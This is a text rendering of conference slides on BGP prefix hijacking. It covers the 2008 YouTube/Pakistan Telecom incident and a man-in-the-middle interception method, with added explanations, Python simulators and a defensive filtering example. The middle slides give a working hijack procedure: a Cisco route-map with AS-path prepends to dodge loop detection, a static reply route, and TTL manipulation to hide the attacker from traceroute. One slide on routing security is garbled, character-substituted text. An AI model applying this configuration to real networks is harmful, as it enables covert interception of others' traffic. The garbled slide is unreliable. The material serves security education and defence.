Border Gateway Protocol Interception

8/13/2019 Border Gateway Protocol Interception 1/31

YouTube (Hi)jack Saga (February 2008)

• YouTube announces 5 prefixes
  – A /19, /20, /22, and two /24s
  – The /22 is 208.65.152.0/22
• Pakistan's government decides to block YouTube
• Pakistan Telecom internally nails up a more specific route (208.65.153.0/24) out of YouTube's /22 to null0 (the router's discard interface)
• Somehow redistributes from static into bgp, then to PCCW (its upstream)
• Upstream provider sends routes to everyone else…
• Most of the net now goes to Pakistan for YouTube, gets nothing!
• YouTube responds by announcing both the /24 and two more-specific /25s, with partial success (many networks filter anything longer than a /24, so the /25s only help where they are accepted)
• PCCW turns off Pakistan Telecom peering two hours later
• Within five minutes afterward, the global bgp table is clean again


Pakistan Govt Notice (slide image of the blocking notice; not recovered)


Of Interest: IP Hijacking BoF

• Un-official event at NANOG conference
• We test security of Internet routing infrastructure
• Recent exercises:
  – Hijacked 1.0.0.0/8: 90% success (the /8 was still unallocated in 2008; APNIC received it in 2010)
  – Hijacked 1x6.0.0.0/16 (middle digit lost in extraction): 95% success
  – Attempted to announce networks longer than /24, from /25 on down, with cooperation of large CDN's: 0% successful overall


    Eouting Securit Is &o'/licated8 No ans9er et, due to lack of chain of trust fro' I&ANN

    on do9n8 =5eakest link> /ro3le'B Hntil everyone filters everyone

    perfectly , this door is still o/en8 *est /ractice toda is =Alerting> s ste's that look for

    rogue announce'ents ?#(AS, EI#G M ASN, Eenes s,etc@

    8 Eegister our AS and our /refi" in EIE ?no i''ediateeffect, 3ut e$entuall so'eone 9ill use the'@

    8 No anon 'it % if ou hi)ack, e$er one kno9s it:s ou?due to AS-#AT(@

    8 If things still 9ork, 9ho co'/lains7


How To Resolve A Hijacking

• Once the rogue announcement is identified, work begins: contact the upstreams and scream
  – May take minutes, hours (if you are youtube-sized), or possibly days
• About as easy as getting DDoS stopped (or not)


What This Means

• Rootkits, 0day, rogue announcements
• Man-in-middle attacks, with our clues applied
  – No need for three-way handshake when you're in-line
  – Nearly invisible exploitation potential, globally
• Endpoint enumeration – direct discovery of who and what your network talks to
• Can be accomplished globally, any-to-any
• How would you know if this isn't happening right now to your traffic at DEFCON?


BGP MITM Hijack Concept

• We originate the route like we always did
  – Win through usual means (prefix length, shorter as-path w/ several origin points, etc.)
  – "Win" is some definition of "most of the internet chooses our route"
• We return the packets somehow
  – Coordinating delivery was non-trivial
  – VPN/tunnel involves untenable coordination at target
• Then it clicked – use the Internet itself as reply path, but how?


BGP MITM Setup

1. Traceroute & plan reply path to target
2. Note the ASN's seen towards target from traceroute & bgp table on your router
3. Apply as-path prepends naming each of the ASN's intended for reply path
4. Nail up static routes towards the next-hop of the first AS in reply path
5. Done

Step 3 is the trick: every AS named in the prepend list sees its own number in the AS-path, rejects the announcement as a loop, and therefore keeps routing toward the real origin. Step 4 is needed because the attacker's own BGP best path for the hijacked prefix now points at itself; the static route forces captured packets out toward the first AS of the reply path instead.


BGP MITM – First Observe

[Diagram: random user ASN 100, target ASN 200, transit ASes AS10, AS20, AS30, AS40, AS50, AS60]

• ASN 200 originates 10.10.220.0/22, sends announcements to its two upstreams (AS20 and one other)
• Internet is converged towards valid route
• View of Forwarding Information Base (FIB) for 10.10.220.0/22 after converging


BGP MITM – Plan reply path

[Diagram: attacker ASN 100, target ASN 200, transit ASes AS10 through AS60, as on the previous slide]

• ASN 100's FIB shows the route for 10.10.220.0/22 via AS10
• We then build our as-path prepend list to include AS 10, 20, and 200


BGP MITM – Setup Routes

[Diagram: same topology as the previous two slides]

• 10.10.220.0/24 is announced with a route-map:

ip prefix-list jacked seq 5 permit 10.10.220.0/24
! the prefix-list is referenced by the route-map but not shown on the slide; defined here so the config is complete
route-map hijacked permit 10
 match ip address prefix-list jacked
 set as-path prepend 10 20 200

• Then, install a static route in AS100 for 10.10.220.0/24 to AS10's link:

ip route 10.10.220.0 255.255.255.0 4.3.2.1

Why this leaves a working reply path: AS10, AS20 and AS200 each find their own number in the AS-path of the /24, treat it as a loop and discard it, so their forwarding for 10.10.220.0 stays on the legitimate route. Everyone else prefers the more specific /24 and delivers the target's traffic to AS100. The static route is needed because AS100's own best route for the /24 is now itself: it pushes the captured packets to AS10, which carries them to AS20 and on to AS200. The origin at the end of the forged path is the legitimate AS200, so a check on origin AS alone passes; AS100 is still visible in the middle of the path, which is what the conclusion slide means by "the as-path does reveal the attacker".
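The five-step procedure and the three diagram slides can be played through in a small simulator. The block below is an added example, not code from the talk: it implements BGP's two relevant rules (drop any path that contains your own ASN; otherwise prefer the shortest path, lowest neighbour on ties) and longest-prefix forwarding, then converges the slides' topology before and after the attacker's announcement. The AS adjacencies, the "random user" AS70, the host address, and the target's prefix length (rendered here as a /22 under the attacker's /24) are assumptions; only the AS numbers, the prepend list 10 20 200 and the static route toward AS10 come from the slides.

```python
"""Toy BGP propagation with AS-path loop detection.

Added example, not code from the talk: it shows why the slides' prepend
list (10 20 200) leaves a working reply path.  Everything below except the
AS numbers on the slides is an assumption: the adjacency list is constructed
(the slides only imply the AS100-AS10 and AS20-AS200 links), AS70 is a
made-up "random user", the target is rendered as originating 10.10.220.0/22
and the attacker as announcing the more specific 10.10.220.0/24.
"""
from ipaddress import ip_address, ip_network

TARGET, ATTACKER, USER = 200, 100, 70
TARGET_PREFIX = ip_network("10.10.220.0/22")
HIJACK_PREFIX = ip_network("10.10.220.0/24")

# Constructed undirected AS adjacencies (assumption).  The attacker is
# multi-homed: the hijack must leave through a neighbour that is *not* in
# the prepend list, or nobody ever hears it.
LINKS = [(200, 20), (200, 30), (20, 10), (20, 40), (30, 40), (30, 60),
         (10, 50), (40, 50), (50, 60), (60, 70), (100, 10), (100, 50)]


def adjacency(links):
    adj = {}
    for a, b in links:
        adj.setdefault(a, set()).add(b)
        adj.setdefault(b, set()).add(a)
    return adj


def converge(links, originations):
    """originations = {asn: {prefix: prepends}}.

    A locally originated route is stored with an empty path.  When an AS
    exports a route it puts its own number in front, followed by any
    configured prepends (the slide's 'set as-path prepend 10 20 200'), then
    the path it learned.  Receivers drop any path containing their own ASN
    (loop detection), otherwise keep the shortest path, lowest neighbour
    ASN on ties.  Returns {asn: {prefix: as_path}}, as_path[0] = neighbour.
    """
    adj = adjacency(links)
    rib = {asn: {} for asn in adj}
    for asn, prefixes in originations.items():
        for prefix in prefixes:
            rib[asn][prefix] = []
    for _ in range(100):                          # rounds until nothing changes
        changed = False
        for sender in adj:
            for prefix, path in list(rib[sender].items()):
                prepends = originations.get(sender, {}).get(prefix, []) if path == [] else []
                export = [sender] + prepends + path
                for rcv in adj[sender]:
                    if rcv in export:             # loop detection: route dropped
                        continue
                    current = rib[rcv].get(prefix)
                    if current == []:             # never displace a local origin
                        continue
                    if current is None or (len(export), export[0]) < (len(current), current[0]):
                        rib[rcv][prefix] = export
                        changed = True
        if not changed:
            break
    return rib


def trace(rib, static_routes, src, dst):
    """Follow longest-prefix-match forwarding AS by AS from src toward dst.

    static_routes = {asn: {prefix: next_hop_asn}} models the slide's
    'ip route 10.10.220.0 255.255.255.0 4.3.2.1' on the attacker's router,
    which overrides its own BGP route for the hijacked /24.
    """
    dst = ip_address(dst)
    hops = [src]
    while len(hops) < 32:
        here = hops[-1]
        matches = [p for p in rib[here] if dst in p]
        if not matches:
            return hops + [None]                  # no route: dropped
        best = max(matches, key=lambda p: p.prefixlen)
        override = static_routes.get(here, {}).get(best)
        if override is not None:
            hops.append(override)
        elif rib[here][best] == []:
            return hops                           # delivered to the origin AS
        else:
            hops.append(rib[here][best][0])
    return hops


def before_and_after(dst="10.10.220.5"):
    """Paths from the random user to a host in the target prefix, before and
    after the hijack, plus the converged post-hijack RIBs for inspection."""
    before = converge(LINKS, {TARGET: {TARGET_PREFIX: []}})
    after = converge(LINKS, {TARGET: {TARGET_PREFIX: []},
                             ATTACKER: {HIJACK_PREFIX: [10, 20, TARGET]}})
    static = {ATTACKER: {HIJACK_PREFIX: 10}}
    return trace(before, {}, USER, dst), trace(after, static, USER, dst), after


if __name__ == "__main__":
    clean, hijacked, rib = before_and_after()
    print("before:", clean)            # [70, 60, 30, 200]
    print("after: ", hijacked)         # [70, 60, 50, 100, 10, 20, 200]
    for asn in (10, 20, 200):
        print(f"AS{asn} has the /24:", HIJACK_PREFIX in rib[asn])   # False: loop-dropped
    print("AS60 sees as-path", rib[60][HIJACK_PREFIX])             # AS100 is visible
```

Two things to look at in the output: without the static route the trace stops at AS100 (the attacker would blackhole the target, as Pakistan Telecom blackholed YouTube), and the AS-path that AS60 installs ends in the legitimate AS200 but has AS100 in the middle, which is the trace the conclusion slide says survives.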


Anonymizing The Hijacker

• We adjust TTL of packets in transit
• Effectively


Without TTL adjustment

 2  12.87.94.9 [AS 7018]  4 msec 4 msec 8 msec
 3  tbr1.cgcil.ip.att.net (12.122.99.38) [AS 7018]  4 msec 8 msec 4 msec
 4  ggr2.cgcil.ip.att.net (12.123.6.29) [AS 7018]  8 msec 4 msec 8 msec
 5  192.205.35.42 [AS 7018]  4 msec 8 msec 4 msec
 6  cr2-loopback.chd.savvis.net (208.172.2.71) [AS 3561]  24 msec 16 msec 28 msec
 7  cr2-pos-0-0-5-0.NewYork.savvis.net (204.70.192.110) [AS 3561]  28 msec 28 msec 28 msec
 8  204.70.196.70 [AS 3561]  28 msec 32 msec 32 msec
 9  208.175.194.10 [AS 3561]  28 msec 32 msec 32 msec
10  colo-69-31-40-107.pilosoft.com (69.31.40.107) [AS 26627]  32 msec 28 msec 28 msec
11  tge2-3-103.ar1.nyc3.us.nlayer.net (69.31.95.97) [AS 4436]  32 msec 32 msec 32 msec
12  (missing from trace: 198.32.160.134, exchange point)
13  tge1-2.fr4.ord.llnw.net (69.28.171.193) [AS 22822]  32 msec 32 msec 40 msec
14  ve6.fr3.ord.llnw.net (69.28.172.41) [AS 22822]  36 msec 32 msec 40 msec
15  tge1-3.fr4.sjc.llnw.net (69.28.171.66) [AS 22822]  84 msec 84 msec 84 msec
16  ve5.fr3.sjc.llnw.net (69.28.171.209) [AS 22822]  96 msec 96 msec 80 msec
17  tge1-1.fr4.lax.llnw.net (69.28.171.117) [AS 22822]  88 msec 92 msec 92 msec
18  tge2-4.fr3.las.llnw.net (69.28.172.85) [AS 22822]  96 msec 96 msec 100 msec
19  switch.ge3-1.fr3.las.llnw.net (208.111.176.2) [AS 22822]  84 msec 88 msec 88 msec
20  gig5-1.esw03.las.switchcommgroup.com (66.209.64.186) [AS 23005]  84 msec 88 msec 88 msec
21  66.209.64.85 [AS 23005]  88 msec 88 msec 88 msec
22  gig0-2.esw07.las.switchcommgroup.com (66.209.64.178) [AS 23005]  88 msec 88 msec 88 msec
23  acs-wireless.demarc.switchcommgroup.com (66.209.64.70) [AS 23005]  88 msec 84 msec 84 msec


With TTL adjustments

 2  12.87.94.9 [AS 7018]  8 msec 8 msec 4 msec
 3  tbr1.cgcil.ip.att.net (12.122.99.38) [AS 7018]  4 msec 8 msec 8 msec
 4  ggr2.cgcil.ip.att.net (12.123.6.29) [AS 7018]  4 msec 8 msec 4 msec
 5  192.205.35.42 [AS 7018]  8 msec 4 msec 8 msec
 6  cr2-loopback.chd.savvis.net (208.172.2.71) [AS 3561]  16 msec 12 msec
 7  cr2-pos-0-0-5-0.NewYork.savvis.net (204.70.192.110) [AS 3561]  28 msec 32 msec 32 msec
 8  204.70.196.70 [AS 3561]  28 msec 32 msec 32 msec
 9  208.175.194.10 [AS 3561]  32 msec 32 msec 32 msec
10  gig5-1.esw03.las.switchcommgroup.com (66.209.64.186) [AS 23005]  88 msec 88 msec 84 msec
11  66.209.64.85 [AS 23005]  88 msec 88 msec 88 msec
12  gig0-2.esw07.las.switchcommgroup.com (66.209.64.178) [AS 23005]  84 msec 84 msec 88 msec
13  acs-wireless.demarc.switchcommgroup.com (66.209.64.70) [AS 23005]  88 msec 88 msec 88 msec


Compare Original BGP & Route Path

Hijacked: the TTL-adjusted trace from the previous slide (13 hops, AT&T → Savvis → Switch Communications).

Original:

 2  12.87.94.9 [AS 7018]  8 msec 8 msec 4 msec
 3  tbr1.cgcil.ip.att.net (12.122.99.38) [AS 7018]  8 msec 8 msec 8 msec
 4  12.122.99.17 [AS 7018]  8 msec 4 msec 8 msec
 5  12.86.156.10 [AS 7018]  12 msec 8 msec 4 msec
 6  tge1-3.fr4.sjc.llnw.net (69.28.171.66) [AS 22822]  68 msec 56 msec 68 msec
 7  ve5.fr3.sjc.llnw.net (69.28.171.209) [AS 22822]  56 msec 68 msec 56 msec
 8  tge1-1.fr4.lax.llnw.net (69.28.171.117) [AS 22822]  64 msec 64 msec 72 msec
 9  tge2-4.fr3.las.llnw.net (69.28.172.85) [AS 22822]  68 msec 72 msec 72 msec
10  switch.ge3-1.fr3.las.llnw.net (208.111.176.2) [AS 22822]  60 msec 60 msec 60 msec
11  gig5-1.esw03.las.switchcommgroup.com (66.209.64.186) [AS 23005]  60 msec 60 msec 60 msec
12  66.209.64.85 [AS 23005]  64 msec 60 msec 60 msec
13  gig0-2.esw07.las.switchcommgroup.com (66.209.64.178) [AS 23005]  60 msec 64 msec 60 msec
14  acs-wireless.demarc.switchcommgroup.com (66.209.64.70) [AS 23005]  60 msec 60 msec 60 msec

Even with the TTL adjustments the two traces do not match: Savvis (AS 3561) has replaced Limelight (AS 22822) in hops 6 through 9, the destination RTT rose from about 60 msec to about 88 msec, and the hop count is 13 rather than 14. The TTL games hide the attacker's own routers from traceroute; they do not make the path look like the original, so a baseline comparison still flags it.
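The TTL arithmetic behind the three traces above, as an added example that is not code from the talk. The hop names, ASNs and RTTs are the first sample of each line on the slides (hop 1 was cropped on the slides and is a constructed "gw"; hop 12 of the unadjusted trace gave no reply, so its RTT is made up). How the attacker actually bumped the TTL is not on the slides; the model here is an assumption: the attacker's ingress router adds ttl_add to the TTL before the usual decrement, so the following ttl_add hops never expire a probe. The block also generalises to the comparison the last slide makes: it reduces any trace to the ASes it visibly crosses and diffs that against a known-good baseline.

```python
"""What traceroute shows when a router on the path bumps the TTL.

Added example, not code from the talk.  Hop names, ASNs and RTTs follow the
slides' traceroutes; the first hop and one RTT are constructed; the TTL
arithmetic (ingress router adds ttl_add before the normal decrement) is an
assumption about how the attacker did it.
"""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Hop:
    name: str
    asn: int            # 0 = unknown (cropped first hop, exchange point)
    rtt_ms: int
    ttl_add: int = 0    # non-zero only on the attacker's ingress router


def hops(rows):
    return [Hop(*row) for row in rows]


ORIGINAL = hops([
    ("gw", 0, 1), ("12.87.94.9", 7018, 8), ("tbr1.cgcil.ip.att.net", 7018, 8),
    ("12.122.99.17", 7018, 8), ("12.86.156.10", 7018, 12),
    ("tge1-3.fr4.sjc.llnw.net", 22822, 68), ("ve5.fr3.sjc.llnw.net", 22822, 56),
    ("tge1-1.fr4.lax.llnw.net", 22822, 64), ("tge2-4.fr3.las.llnw.net", 22822, 68),
    ("switch.ge3-1.fr3.las.llnw.net", 22822, 60),
    ("gig5-1.esw03.las.switchcommgroup.com", 23005, 60), ("66.209.64.85", 23005, 64),
    ("gig0-2.esw07.las.switchcommgroup.com", 23005, 60),
    ("acs-wireless.demarc.switchcommgroup.com", 23005, 60)])

HIJACKED = hops([
    ("gw", 0, 1), ("12.87.94.9", 7018, 4), ("tbr1.cgcil.ip.att.net", 7018, 4),
    ("ggr2.cgcil.ip.att.net", 7018, 8), ("192.205.35.42", 7018, 4),
    ("cr2-loopback.chd.savvis.net", 3561, 24), ("cr2-pos-0-0-5-0.NewYork.savvis.net", 3561, 28),
    ("204.70.196.70", 3561, 28), ("208.175.194.10", 3561, 28),
    ("colo-69-31-40-107.pilosoft.com", 26627, 32),          # the attacker's router
    ("tge2-3-103.ar1.nyc3.us.nlayer.net", 4436, 32),
    ("198.32.160.134", 0, 32),                               # exchange point; RTT made up
    ("tge1-2.fr4.ord.llnw.net", 22822, 32), ("ve6.fr3.ord.llnw.net", 22822, 36),
    ("tge1-3.fr4.sjc.llnw.net", 22822, 84), ("ve5.fr3.sjc.llnw.net", 22822, 96),
    ("tge1-1.fr4.lax.llnw.net", 22822, 88), ("tge2-4.fr3.las.llnw.net", 22822, 96),
    ("switch.ge3-1.fr3.las.llnw.net", 22822, 84),
    ("gig5-1.esw03.las.switchcommgroup.com", 23005, 84), ("66.209.64.85", 23005, 88),
    ("gig0-2.esw07.las.switchcommgroup.com", 23005, 88),
    ("acs-wireless.demarc.switchcommgroup.com", 23005, 88)])

# Same detour, but the attacker's router adds 10 to the TTL: one for itself and
# one for each of the nine hops between it and the victim's own network (AS 23005).
HIJACKED_TTL_ADJUSTED = [replace(h, ttl_add=10) if h.asn == 26627 else h for h in HIJACKED]


def traceroute(path, max_ttl=40):
    """Return what traceroute prints: (hop number, name, asn, rtt) per line."""
    routers, dest = path[:-1], path[-1]
    printed = []
    for ttl in range(1, max_ttl + 1):
        remaining = ttl
        for r in routers:
            remaining = remaining + r.ttl_add - 1
            if remaining == 0:                  # expired here: ICMP time exceeded
                printed.append((ttl, r.name, r.asn, r.rtt_ms))
                break
        else:                                   # survived every router: host answers
            printed.append((ttl, dest.name, dest.asn, dest.rtt_ms))
            return printed
    return printed


def as_sequence(printed):
    """Collapse a trace to the sequence of ASes it visibly crosses."""
    seq = []
    for _, _, asn, _ in printed:
        if asn and (not seq or seq[-1] != asn):
            seq.append(asn)
    return seq


def path_changed(baseline, observed):
    """(ASes that appeared, ASes that vanished) versus a known-good trace."""
    base, obs = set(as_sequence(baseline)), set(as_sequence(observed))
    return sorted(obs - base), sorted(base - obs)


if __name__ == "__main__":
    for label, path in (("original", ORIGINAL), ("hijacked", HIJACKED),
                        ("hijacked+ttl", HIJACKED_TTL_ADJUSTED)):
        t = traceroute(path)
        print(f"{label}: {len(t)} hops, ASes {as_sequence(t)}, RTT {t[-1][3]} msec, "
              f"vs original {path_changed(traceroute(ORIGINAL), t)}")
```

With ttl_add=10 the probe that would have expired at the pilosoft router instead dies at the first Switch Communications hop, which is why the adjusted trace shows that router as hop 10 and ends at hop 13, exactly as on the slide. The AS-level diff still reports Savvis appearing and Limelight vanishing; only the attacker's own AS 26627 is hidden.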


In conclusion

• We learned that an arbitrary prefix can be hijacked, without breaking end-to-end
• We saw it can happen nearly invisibly
• We noted the BGP as-path does reveal the attacker
• Shields up: filter your customers
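"Filter your customers" and the "alerting systems" of the Routing Security slide are two halves of the same policy check, so one added example covers both; it is not code from the talk. REGISTRY stands in for what a provider builds from its customers' RIR/IRR registrations (the slides' "register your AS and your prefix"); MONITORED is what a prefix holder feeds an alerting service. The UPDATE records are constructed: two are modelled on the 2008 incident (YouTube AS36561, Pakistan Telecom AS17557, the real 208.65.152.0/22 and 208.65.153.0/24), the Pakistan Telecom "own" block is an RFC 5737 documentation prefix, and the last is the MITM announcement from the setup slides; the maxLength values and AS200's upstream set are assumptions.

```python
"""Customer ingress filtering and rogue-announcement alerting in one place.

Added example, not code from the talk.  REGISTRY, MONITORED and UPDATES are
constructed (see the lead-in); ASNs and prefixes of the 2008 incident are
real, the rest are assumptions.
"""
from ipaddress import ip_network

# {customer_asn: [(registered prefix, longest length accepted from it)]}
REGISTRY = {
    36561: [("208.65.152.0/22", 24)],
    17557: [("203.0.113.0/24", 24)],      # hypothetical registration
}

# {prefix: (expected origin ASN, expected upstream ASNs, or empty if unknown)}
MONITORED = {
    "208.65.152.0/22": (36561, set()),
    "10.10.220.0/22": (200, {20, 30}),    # the slides' target; upstreams assumed
}

UPDATES = [  # constructed UPDATE records: who sent it, prefix, AS-path (origin last)
    {"from_asn": 17557, "prefix": "208.65.153.0/24", "as_path": [17557]},
    {"from_asn": 17557, "prefix": "203.0.113.0/24", "as_path": [17557]},
    {"from_asn": 36561, "prefix": "208.65.152.0/22", "as_path": [36561]},
    {"from_asn": 100, "prefix": "10.10.220.0/24", "as_path": [100, 10, 20, 200]},
]


def registered_cover(asn, prefix):
    """True if the customer registered a block that covers prefix and allows
    a prefix that long."""
    net = ip_network(prefix)
    return any(net.subnet_of(ip_network(reg)) and net.prefixlen <= max_len
               for reg, max_len in REGISTRY.get(asn, []))


def ingress_filter(update):
    """Import policy for a leaf customer session: the slides' 'filter your
    customers'.  PCCW applying this to Pakistan Telecom would have dropped
    the YouTube /24 at the first hop."""
    asn, prefix, path = update["from_asn"], update["prefix"], update["as_path"]
    if asn not in REGISTRY:
        return "reject", f"AS{asn} has no registered prefixes on this session"
    if set(path) != {asn}:
        return "reject", f"AS-path {path} is not the customer's own AS{asn}"
    if ip_network(prefix).prefixlen > 24:
        return "reject", f"{prefix} is longer than /24"
    if not registered_cover(asn, prefix):
        return "reject", f"{prefix} is outside AS{asn}'s registered prefixes"
    return "accept", "within registration"


def alerts(update):
    """What a rogue-announcement monitor (the slides' PHAS / MyASN / Renesys
    class of service) would flag for one UPDATE."""
    net, path = ip_network(update["prefix"]), update["as_path"]
    found = []
    for mon, (origin, upstreams) in MONITORED.items():
        mon_net = ip_network(mon)
        if not net.subnet_of(mon_net):
            continue
        if net.prefixlen > mon_net.prefixlen:
            found.append(f"more specific {net} of monitored {mon_net}")
        if path[-1] != origin:
            found.append(f"origin AS{path[-1]} is not the registered AS{origin}")
        elif upstreams and len(path) > 1 and path[-2] not in upstreams:
            found.append(f"AS{path[-2]} is not a known upstream of AS{origin}")
    return found


def run(updates=UPDATES):
    return [(u["prefix"], ingress_filter(u), alerts(u)) for u in updates]


if __name__ == "__main__":
    for prefix, verdict, found in run():
        print(prefix, verdict, found or "no alerts")
```

The Pakistan /24 fails the customer filter and trips two alerts (more specific, wrong origin). The MITM announcement is different: its origin is the real AS200 and the AS next to the origin is a real upstream, so the origin and upstream checks are silent and only the more-specific check fires. That is the practical lesson of the conclusion slide: filter at the customer edge where the registration is known, and alert on any more specific of your own prefixes rather than on origin alone.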


Thanks & Praise

• Felix Lindner
• Jay Beale
• Dan Kaminsky
• Defcon Speaker Goons & Staff
• Todd Underwood